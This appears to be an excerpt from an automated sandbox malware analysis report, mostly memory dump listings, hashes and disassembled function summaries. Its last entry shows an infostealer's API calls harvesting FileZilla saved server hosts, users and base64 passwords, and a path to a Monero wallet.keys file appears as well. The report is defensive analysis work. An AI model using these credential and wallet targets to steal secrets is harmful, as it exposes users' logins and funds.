                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 5e9d896aa01db2d4672592e1ecfa3d466fd2625c9b9be430a9653db60a122340
                  • Instruction ID: 06ea30ffdf383a4aae746accf94fa84c2739586dc6ca7f33ef49599410626b48
                  • Opcode Fuzzy Hash: 5e9d896aa01db2d4672592e1ecfa3d466fd2625c9b9be430a9653db60a122340
                  • Instruction Fuzzy Hash: F811B17180011DABDB64EBF0EC95AED733AAF10300F4042ADA55A56092EF302B4ADBD6
                  Function 0090FED0 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Mv=
                  • API String ID: 0-1032575449
                  • Opcode ID: 06d09e0fc6b59da00f0f26d543b4624ba935f694b6c8ac2f26505a5756ef7eb5
                  • Instruction ID: 6699a167afdbdb2f901f6b31c0884228e75aba102b833d96fe7439fdc70cd50d
                  • Opcode Fuzzy Hash: 06d09e0fc6b59da00f0f26d543b4624ba935f694b6c8ac2f26505a5756ef7eb5
                  • Instruction Fuzzy Hash: 4F7137F3E182245BE3506E2CDD4876ABBD5EB94320F1B463DDEC893784E9799C0486C6
                  Function 009A2903 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Sd?~
                  • API String ID: 0-1480682155
                  • Opcode ID: b4be8d9e5dad01728ce47cdbdb3a183222146b5474790bccdfea205d7b0442ca
                  • Instruction ID: 05c079a449bb077b2d76fe591a04a271fde70639b49dd93b2a650db548bdd3fa
                  • Opcode Fuzzy Hash: b4be8d9e5dad01728ce47cdbdb3a183222146b5474790bccdfea205d7b0442ca
                  • Instruction Fuzzy Hash: 99416AF79082085FE314BE29EC85776B7E6DB90320F16813DDAC5873C4F93959498646
                  Function 008A01D8 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: AQY=
                  • API String ID: 0-1552092879
                  • Opcode ID: 8439ca3eb026dff466eec4a473c0a393e792b697b319e8ed8fcf82db2752b831
                  • Instruction ID: 6f508a5d4e91246860e7f4b900ec94bdb58bc4fd07da7184d69e3948f5ce2858
                  • Opcode Fuzzy Hash: 8439ca3eb026dff466eec4a473c0a393e792b697b319e8ed8fcf82db2752b831
                  • Instruction Fuzzy Hash: 784124F3E482045FE300AE6CDCC0766B7DADF94310F6A853CEB98D7748E93999058296
                  Function 00A6C8D5 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Rpw
                  • API String ID: 0-3594663097
                  • Opcode ID: fdd429c9dc11031785d4886cd6b6097dc427d829734cd9bed8ea623ff081f19b
                  • Instruction ID: ef4e084ad361e2cb540cfa530b0d43f0d38231c3c16db89895ce574e954ce96b
                  • Opcode Fuzzy Hash: fdd429c9dc11031785d4886cd6b6097dc427d829734cd9bed8ea623ff081f19b
                  • Instruction Fuzzy Hash: E44138B250C300AFE309AF1AD88566EFBE9FF98720F16892DE6C583A54D73454808A57
                  Function 0093E406 Relevance: .2, Instructions: 165COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 119dac8ed904974dbb8f388dd872ae70df35b25f1d6b427b74facf806aec48bc
                  • Instruction ID: bbaf7367b589fc3e385a8aaf66875faac478a10e389c43d90d0c61d79d8ae737
                  • Opcode Fuzzy Hash: 119dac8ed904974dbb8f388dd872ae70df35b25f1d6b427b74facf806aec48bc
                  • Instruction Fuzzy Hash: C5513CB3A182108BE3446E29DC847BAF6D5DBD4320F1B453DEAC9D7784D9785C058787
                  Function 00979337 Relevance: .1, Instructions: 148COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 320d1a1516fddd3d038ae428a68287df2871285256b3f09ccba9533d5ea0007f
                  • Instruction ID: 242633a606b07819de2f0386961b2d7c8a8c95cf5376ed752a0d562cda0af4ca
                  • Opcode Fuzzy Hash: 320d1a1516fddd3d038ae428a68287df2871285256b3f09ccba9533d5ea0007f
                  • Instruction Fuzzy Hash: 4341E8F3608204AFF3045E29EC957BAB7D6EFD4720F29853DE685C7780ED7998028256
                  Function 00AAD3CF Relevance: .1, Instructions: 87COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2e2030ab2f9398cd2ef9cbb2358fd48b5fe47a8064e139aafaf0ff51f5c194cb
                  • Instruction ID: 6186b3b6605606c3724f1cc59e4b94e917730766e1fc9f6d8238a311f1de4b27
                  • Opcode Fuzzy Hash: 2e2030ab2f9398cd2ef9cbb2358fd48b5fe47a8064e139aafaf0ff51f5c194cb
                  • Instruction Fuzzy Hash: C43108B250D6109FE301FF29D8857AAFBE6EF98311F16892CD6D483A58DA345450CB87
                  Function 00A6B582 Relevance: .1, Instructions: 71COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cca2488c4e717cb1fac6a0994c89105a98fde1840e80f642ee576d5c1f64e70d
                  • Instruction ID: 719d69c8029b1d2b4cf9066c95286a78e49a46502528fa6c30a62f1e3fe5db2d
                  • Opcode Fuzzy Hash: cca2488c4e717cb1fac6a0994c89105a98fde1840e80f642ee576d5c1f64e70d
                  • Instruction Fuzzy Hash: F02138B210C604AFE312BE1ADC857AEFBE6FFD8310F16881DD2D483610E63464518A97
                  Function 00639750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 00630250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                    • Part of subcall function 006299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                    • Part of subcall function 006299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                    • Part of subcall function 006299C0: ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                    • Part of subcall function 006299C0: LocalFree.KERNEL32(0062148F), ref: 00629A90
                    • Part of subcall function 006299C0: CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                    • Part of subcall function 00638E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00638E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00640DBA,00640DB7,00640DB6,00640DB3), ref: 00630362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00630369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00630385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 006303CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 006303DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00630419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00630463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 0063051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 0063054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00630562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00630571
                  • lstrcat.KERNEL32(?,url: ), ref: 00630580
                  • lstrcat.KERNEL32(?,00000000), ref: 00630593
                  • lstrcat.KERNEL32(?,00641678), ref: 006305A2
                  • lstrcat.KERNEL32(?,00000000), ref: 006305B5
                  • lstrcat.KERNEL32(?,0064167C), ref: 006305C4
                  • lstrcat.KERNEL32(?,login: ), ref: 006305D3
                  • lstrcat.KERNEL32(?,00000000), ref: 006305E6
                  • lstrcat.KERNEL32(?,00641688), ref: 006305F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00630604
                  • lstrcat.KERNEL32(?,00000000), ref: 00630617
                  • lstrcat.KERNEL32(?,00641698), ref: 00630626
                  • lstrcat.KERNEL32(?,0064169C), ref: 00630635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 0063068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
